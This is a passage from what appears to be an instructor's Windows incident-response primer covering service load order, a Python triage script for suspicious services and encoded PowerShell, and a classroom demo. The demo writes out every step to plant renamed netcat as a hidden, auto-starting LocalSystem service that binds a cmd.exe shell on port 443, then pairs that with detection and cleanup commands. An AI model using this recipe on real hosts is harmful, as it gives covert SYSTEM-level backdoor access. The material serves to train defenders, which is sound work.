HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ServiceGroupOrder
```

The HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\GroupOrderList subkey determines the order in which services within a service group are loaded. Services in a service group are assigned a tag, a unique numeric value within the group, which determines the service load order. Drivers are loaded in the order of the registry's Load Ordering Group List, followed by drivers not in the list.

Keep in mind that if a malicious driver was loaded first into, let's say, the TCP/IP service, controlling the other legitimate drivers and dependencies, it could hide traffic from even showing up in Wireshark.
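Two of the checks this section asks for, as an added example that is not the primer's own code: decoding an -EncodedCommand argument such as the IchBinBosh task action from 5.2.2 (powershell.exe base64-encodes the UTF-16LE bytes of the script, which is why a plain base64 decode shows a NUL after every character), and flagging a service whose ServiceDll or image lives outside System32, including the whitespace-padded "C:\windows \system32 \" directory from the smphost demo above and, more generally, any system image name running from another directory. The ENTRIES records are constructed to mirror the demo; the svchost.exe -k group name for smphost is a placeholder.

```python
import base64
import re

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Images that only ever run from the system directories; anywhere else is suspect.
SYSTEM_IMAGES = {"svchost.exe", "lsass.exe", "smss.exe", "csrss.exe", "services.exe"}
PATH_TOKEN = re.compile(r'"([^"]+)"|([A-Za-z]:\\[^\s"]+)')  # quoted strings or bare drive paths
# powershell.exe accepts -e, -ec, -enc, -encode and -EncodedCommand; require a long base64 token.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I)

# Constructed entries: a legitimate service, smphost as modified in the demo above (the
# -k group name is a placeholder), a service borrowing a system image name from a
# lookalike directory, and the IchBinBosh task action from 5.2.2.
ENTRIES = [
    {"Name": "eventlog", "ImagePath": r"C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p",
     "ServiceDll": r"%SystemRoot%\System32\wevtsvc.dll", "ObjectName": r"NT AUTHORITY\LocalService"},
    {"Name": "smphost", "ImagePath": r"C:\windows\System32\svchost.exe -k PLACEHOLDER_GROUP",
     "ServiceDll": r"c:\windows \system32 \payload.dll", "ObjectName": "LocalSystem"},
    {"Name": "Service Host", "ImagePath": r"c:\windows\systme32\svchost.exe", "ObjectName": "LocalSystem"},
    {"Name": "IchBinBosh", "ImagePath": "powershell.exe -win hidden -encode JABMAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgANgA2ADYANgApADsAJABMAC4AUwB0AGEAcgB0ACgAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADYAMAA="},
]


def decode_encoded_command(command_line):
    """The script behind an -EncodedCommand argument, or None when there is none.
    PowerShell base64-encodes the UTF-16LE bytes of the script, hence the codec."""
    m = ENCODED_ARG.search(command_line)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def normalized(path):
    """Lower-cased with %SystemRoot% expanded, for comparisons only."""
    return re.sub(r"%systemroot%", r"c:\\windows", path.lower())


def check_path(label, path, findings):
    """Where a service image or DLL lives, keeping the whitespace-padded directory trick visible."""
    directory, _, filename = normalized(path).rpartition("\\")
    if any(part != part.strip() for part in path.split("\\")):
        findings.append(f"{label}: whitespace-padded directory name in {path!r}")
    if label == "ServiceDll" and directory not in SYSTEM_DIRS:
        findings.append(f"ServiceDll loaded from outside System32: {path}")
    if filename in SYSTEM_IMAGES and directory not in SYSTEM_DIRS:
        findings.append(f"{label}: system image name {filename} running from {directory!r}")


def triage_entry(entry):
    """Findings for one service or scheduled-task entry; an empty list means nothing stood out."""
    findings = []
    command = entry["ImagePath"]
    for quoted, bare in PATH_TOKEN.findall(command):
        check_path("ImagePath", quoted or bare, findings)
    if entry.get("ServiceDll"):
        check_path("ServiceDll", entry["ServiceDll"], findings)
    decoded = decode_encoded_command(command)
    if decoded is not None:
        findings.append(f"ImagePath: encoded PowerShell decodes to: {decoded}")
    if HIDDEN_WINDOW.search(command):
        findings.append("ImagePath: PowerShell started with a hidden window")
    if findings and entry.get("ObjectName", "").lower() == "localsystem":
        findings.append("runs as LocalSystem, so whatever it loads runs as SYSTEM")
    return findings


if __name__ == "__main__":
    for entry in ENTRIES:
        print(entry["Name"], triage_entry(entry) or ["nothing stood out"])
```

Feed it the output of `reg query ...\Services /s` or `Get-CimInstance win32_service` parsed into the same dictionaries and the eventlog entry stays clean while the modified smphost entry is reported on both its padded path and its DLL location.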
### 7.2 Demo: Service configuration post-modification behavior

COMMAND LINE

For this demo netcat was used and renamed to svchost.exe.

1. Change directory to C:\windows and create a folder named Systme32.
2. Apply the hidden attribute to the folder.
3. Copy netcat.exe to the newly created folder and make sure its name is now svchost.exe.
4. Apply the hidden attribute to svchost.exe.

```
cd c:\windows
mkdir Systme32
attrib +h Systme32
copy (path of netcat.exe) c:\windows\systme32\svchost.exe
attrib +h svchost.exe
```

Create the malicious service (DON'T LET THE STUDENTS SEE YOU DO THIS). This will create a service named "Service Host":

```
SC Create "Service Host" type=own start=auto error=normal binpath= "cmd /k c:\windows\systme32\svchost.exe -Lvp 443 -e cmd.exe" obj=LocalSystem
```

Create the Description value to make the service look more legitimate:

```
reg add "hklm\system\currentcontrolset\services\service host" /v Description /t reg_sz /d "Svchost is essential in the implementation of so-called shared service processes, where a number of services can share a process in order to reduce resource consumption."
```

Don't forget to start the new service:

```
net start "Service Host"
```

Q: So, from what we learned earlier, what are the first steps to finding the malware?

```
Get-process | select name,id,path
```

If they don't find the malware, pull the netstat list to see if they can find the port:

```
netstat -ano
```

Run netstat -ano and point out the open port 443; this host should never be listening on it.

Open another command prompt and connect to the open port, then run whoami to show you now have SYSTEM-level access:

```
c:\windows\systme32\svchost.exe 127.0.0.1 443
```

Search for all non-System32 processes first; you will find it faster.
```
Get-CimInstance win32_service | select name, processid, pathname | where {$_.pathname -notmatch "system32"}
get-process | select name,id,path | where path -notmatch "system32"
```

Cleanup DEMO:

```
netstat -ano | findstr /i "443"        # get the PID of the process on 127.0.0.1:443
taskkill /pid <pid_of_process> /f
rmdir /s c:\windows\systme32
```

## Summary

Today we talked about how to list the Windows operating system processes and explored different ways to make a process execute. We also looked at different ways to follow what a process does during execution, like starting other/new processes. Processes can be made to look like other known-good processes in an attempt to be nefarious, and we now have a good grasp of how to decipher between the two.

## Resources

Processes
- Microsoft Reference - Get-Process
- Microsoft Reference - Get-CimInstance

Services
- Microsoft Reference - Services.msc
- Microsoft Reference - Get-Service
- Microsoft Reference - SC Query

Network Connections
- Netstat for Beginners

DLL Info
- DLLs and Services
- Microsoft Reference - DLL
- Microsoft Compromised DLLs
- DLL Hijacking

Sysinternal Tools
- Microsoft Reference - ProcExp
- Microsoft Reference - AutoRuns
- Microsoft Reference - TCPView